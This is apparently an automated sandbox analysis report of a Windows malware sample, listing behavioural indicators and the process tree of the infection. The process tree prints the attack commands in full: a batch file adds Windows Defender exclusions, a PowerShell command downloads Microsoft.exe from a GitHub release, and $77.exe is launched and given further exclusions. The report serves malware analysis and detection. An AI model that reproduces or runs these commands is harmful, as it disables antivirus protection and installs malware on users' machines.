Token: SeDebugPrivilege N/A C:\ProgramData\$77 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1460 wrote to memory of 4048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 3780 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 3780 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1460 wrote to memory of 4760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/erWKY2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff92b3a46f8,0x7ff92b3a4708,0x7ff92b3a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3448 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6016 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\W.bat" "

C:\Windows\system32\net.exe

NET FILE

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 FILE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Add-MpPreference -ExclusionPath 'C:\'"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/e1v1/W/releases/download/W/Microsoft.exe', 'C:\Users\Admin\AppData\Local\Temp\Microsoft.exe')"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$77.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\$77'

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

